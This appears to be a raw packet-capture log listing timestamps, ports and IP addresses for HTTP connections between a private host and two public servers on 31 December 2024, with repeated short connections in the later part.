Dec 31, 2024 09:48:44.109430075 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109462023 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109472036 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.109488964 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109503031 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.109519958 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109553099 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109579086 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109596968 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.109611034 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109620094 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.109642982 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109690905 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109708071 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.109723091 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109755039 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109790087 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.109791040 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109842062 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109888077 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.109889984 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109921932 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109954119 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.109958887 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.110002041 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.110033989 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.110035896 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.110064983 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.110096931 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.110105991 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.110126972 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.110158920 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.110165119 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.110191107 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.110223055 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.110223055 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.110255003 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.110260010 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.110286951 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.110317945 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.110349894 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.110357046 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.110383034 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.110405922 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.110877037 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.110908985 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.110920906 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.110941887 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.110989094 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111021996 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111032009 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.111052990 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111057043 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.111084938 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111115932 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111148119 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.111148119 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111180067 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111212015 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111221075 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.111243963 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111253023 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.111275911 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111341953 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111373901 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111382008 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.111401081 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111432076 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111434937 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.111484051 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111527920 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.111530066 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111562967 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111593962 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111603022 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.111625910 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111656904 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.111658096 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111706972 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111745119 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.111752987 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111802101 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111830950 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.111848116 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111887932 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111891985 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.111934900 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111968040 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.111970901 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.111998081 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112030029 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112032890 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.112061977 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112093925 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112097979 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.112121105 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112154007 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112173080 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.112185001 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112211943 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112221003 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.112243891 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112277031 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112308025 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112323999 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.112339973 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112345934 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.112371922 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112402916 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112411022 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.112432957 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112464905 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112479925 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.112497091 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112529993 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112559080 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112565041 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.112590075 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.112591028 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112622023 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112653971 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112658024 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.112682104 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112711906 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112720013 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.112742901 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112759113 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.112776041 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112781048 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.112808943 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112839937 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112870932 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112880945 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.112901926 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112910032 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.112934113 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112963915 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.112994909 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.113023043 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.113025904 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.113040924 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.113059998 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.113086939 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.113120079 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.117790937 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.157782078 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.157826900 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.157835960 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.157876015 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.157917976 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.231971979 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.231985092 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.231995106 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.232047081 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.233171940 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.233185053 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.233195066 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.233244896 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.233257055 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.233618021 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.233653069 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.233664036 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.233675003 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.233695030 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.233706951 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.233716965 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.233717918 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.233728886 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.233740091 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.233745098 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.233772993 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.234018087 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234029055 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234069109 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234074116 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.234081030 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234091997 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234102964 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234107018 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.234133005 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.234154940 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234164953 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234174967 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234193087 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.234249115 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234258890 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234270096 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234281063 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234291077 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234296083 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.234299898 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234312057 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.234316111 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234327078 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.234333038 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234342098 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234350920 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234353065 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.234363079 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234369993 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.234375000 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234385967 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234395981 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.234395981 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234406948 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234431982 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.234611988 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234658957 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234668970 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234678984 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234690905 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234693050 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.234704971 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.234711885 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.234726906 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.235165119 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.235176086 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.235187054 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.235203981 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.235213995 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.235213995 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.235224962 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.235234022 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.235249996 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.235279083 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.235287905 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.235299110 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.235308886 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.235326052 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.235333920 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.235337973 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.235347986 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.235358000 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.235358953 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:44.235374928 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:44.235388994 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:46.326416016 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:49:04.793220043 CET	49914	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:04.798049927 CET	80	49914	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:04.798113108 CET	49914	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:04.798247099 CET	49914	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:04.803047895 CET	80	49914	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:05.504883051 CET	80	49914	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:05.505141020 CET	49914	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:07.022634029 CET	49914	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:07.022959948 CET	49930	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:07.027693987 CET	80	49914	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:07.027755022 CET	49914	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:07.027818918 CET	80	49930	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:07.027987957 CET	49930	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:07.028126001 CET	49930	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:07.032946110 CET	80	49930	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:07.742714882 CET	80	49930	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:07.742800951 CET	49930	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:09.366290092 CET	49930	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:09.366611958 CET	49946	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:09.371290922 CET	80	49930	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:09.371381044 CET	49930	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:09.371512890 CET	80	49946	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:09.371589899 CET	49946	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:09.371814966 CET	49946	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:09.377137899 CET	80	49946	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:10.169357061 CET	80	49946	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:10.169424057 CET	49946	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:11.678649902 CET	49946	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:11.678993940 CET	49963	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:11.683609009 CET	80	49946	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:11.683676958 CET	49946	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:11.683756113 CET	80	49963	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:11.683942080 CET	49963	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:11.684186935 CET	49963	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:11.688983917 CET	80	49963	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:12.388041019 CET	80	49963	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:12.388153076 CET	49963	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:14.025348902 CET	49963	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:14.025646925 CET	49979	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:14.030322075 CET	80	49963	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:14.030379057 CET	49963	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:14.030421019 CET	80	49979	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:14.030486107 CET	49979	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:14.030733109 CET	49979	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:14.035485029 CET	80	49979	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:14.730952978 CET	80	49979	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:14.731018066 CET	49979	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:16.241357088 CET	49979	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:16.241919994 CET	49993	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:16.246272087 CET	80	49979	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:16.246315002 CET	49979	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:16.246736050 CET	80	49993	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:16.246829987 CET	49993	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:16.247111082 CET	49993	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:16.251894951 CET	80	49993	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:16.942919016 CET	80	49993	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:16.943041086 CET	49993	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:18.571327925 CET	49993	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:18.571810007 CET	50000	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:18.576319933 CET	80	49993	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:18.576633930 CET	80	50000	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:18.576906919 CET	49993	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:18.576906919 CET	50000	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:18.577122927 CET	50000	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:18.581840992 CET	80	50000	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:19.278074980 CET	80	50000	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:19.278175116 CET	50000	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:20.788223028 CET	50000	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:20.788583040 CET	50002	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:20.793160915 CET	80	50000	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:20.793257952 CET	50000	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:20.793315887 CET	80	50002	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:20.793484926 CET	50002	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:20.793517113 CET	50002	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:20.798305035 CET	80	50002	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:23.637319088 CET	80	50002	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:23.637464046 CET	50002	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:25.256896973 CET	50002	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:25.257249117 CET	50003	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:25.261982918 CET	80	50002	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:25.262032032 CET	80	50003	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:25.262109995 CET	50002	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:25.262140989 CET	50003	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:25.262285948 CET	50003	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:25.267061949 CET	80	50003	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:26.093508005 CET	80	50003	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:26.093609095 CET	50003	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:27.622024059 CET	50003	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:27.626280069 CET	50004	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:27.627471924 CET	80	50003	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:27.627557039 CET	50003	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:27.631436110 CET	80	50004	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:27.631524086 CET	50004	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:27.644278049 CET	50004	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:27.649360895 CET	80	50004	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:28.349101067 CET	80	50004	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:28.349165916 CET	50004	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:29.994273901 CET	50004	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:29.994617939 CET	50005	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:29.999356031 CET	80	50004	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:29.999392986 CET	80	50005	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:29.999452114 CET	50004	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:29.999497890 CET	50005	80	192.168.2.6	185.215.113.43
